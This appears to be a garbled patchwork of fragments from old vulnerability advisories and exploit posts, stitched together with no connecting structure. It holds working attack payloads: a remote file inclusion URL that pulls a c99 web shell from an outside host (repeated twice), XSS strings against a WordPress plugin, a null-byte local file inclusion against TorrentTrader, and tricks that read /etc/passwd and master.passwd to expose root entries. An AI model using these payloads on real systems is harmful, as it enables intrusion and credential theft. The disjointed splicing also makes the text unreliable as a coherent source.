and regedit application open. Log off the workstation, and then log
back in to your domain account. Refresh the NL$ list. The NL$ line
item that has been updated is your domain user's cached session.
Step 6: For this example, we will assume that your NL$ record is "NL$4"
Step 7: Double click on "NL$4". Take note of the four hex characters
that are located in positions 1, 2, 3, and 4 on line 3 of the hex
data.
Step 8: For this example, the hex characters are "5a 04". This number
is the Active Directory octet string representation of your domain
account's objectSID (The user account unique section of your AD
Security Identifier).
https://target-domain.foo:2381/hmanics/hmanics.snmp.php
For windows :-
Fatal error: Call to undefined function QueueSNMP() in
C:\hp\hpsmh\data\htdocs\hmanics\hmanics.snmp.php.en on line 3
For Linux:-
Fatal error: Call to undefined function QueueSNMP() in
/opt/hp/hpsmh/data/htdocs/hmanics/hmanics.snmp.php.en on line 3
--- SQL Exception Logs ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ` -1` at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near `-1` at line 2
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ` -1 ` at line 3
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ` -1 `at line 4
Picture(s):
../1.png
Use the "Execute SQL" feature in the mysql module by passing
"/etc/master.passwd" parameter as the file path to the .sql file:
-- cut --
Output from SQL commands in file /etc/master.passwd ..
ERROR 1064 (42000) at line 3: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the
right syntax to use near 'root:$1$HASH_HERE.:0:0::0:0:Charlie
&:/root:/usr/local/bin/' at line 1
-- cut --
> #Location : Turkey
> ########################################################################
> #file :
> # init.poll.php
> # line 2 $inc_path = dirname($include_class);
> # line 3 require ($inc_path."/voting.poll.php");
> ########################################################################
> #3xplo!t :
> #http://target.com/[path]/php/init.poll.php?include_class=http://www.ekin0x.com/c99.txt?
> ########################################################################
> #eser@ekin0x.com (all crew shell)
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3Cli%3E
Register Globals: Off
Vuln Line:(3) <input type="hidden" name="page" value="<?php echo
$_GET['page'] ?>"/>
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
3) Remote Code Execution
cxib#
result.txt has been created.
cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt
69647 >>> /etc/passwd: line 3: unknown configuration line "root:*:0:0:Charlie &:/root:/bin/csh"
69647 >>> /etc/passwd: line 4: unknown configuration line "toor:*:0:0:Bourne-again Superuser:/root:"
..... etc.
We can read file and safe_mode and open_basedir is bypassed.
| {
| echo "<meta http-equiv='refresh' content='0;URL=install.php'>";
| exit;
| }
Your redirection is in line 6, the RFI in line 3.
First hit wins: RFI. ;-)
Regards,
Carsten
Requested URL:
https://moodle.target.ac.uk/course/report/stats/report.php
Response:
Fatal error: Call to undefined function get_courses() in
/Volumes/<dir_name>/data/moodle/course/report/stats/report.php on line 3
Tested environment:
#Location : Turkey
########################################################################
#file :
# init.poll.php
# line 2 $inc_path = dirname($include_class);
# line 3 require ($inc_path."/voting.poll.php");
########################################################################
#3xplo!t :
#http://target.com/[path]/php/init.poll.php?include_class=http://www.ekin0x.com/c99.txt?
########################################################################
#eser@ekin0x.com (all crew shell)
http://localhost/torrenttrader109/backend/Admin-functions.php
"Warning: require_once(./themes//block.php) [function.require-once]:
failed to open stream: No such file or directory in
C:\apache_wwwroot\torrenttrader109\backend\admin-functions.php on line 3"
If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible:
http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00
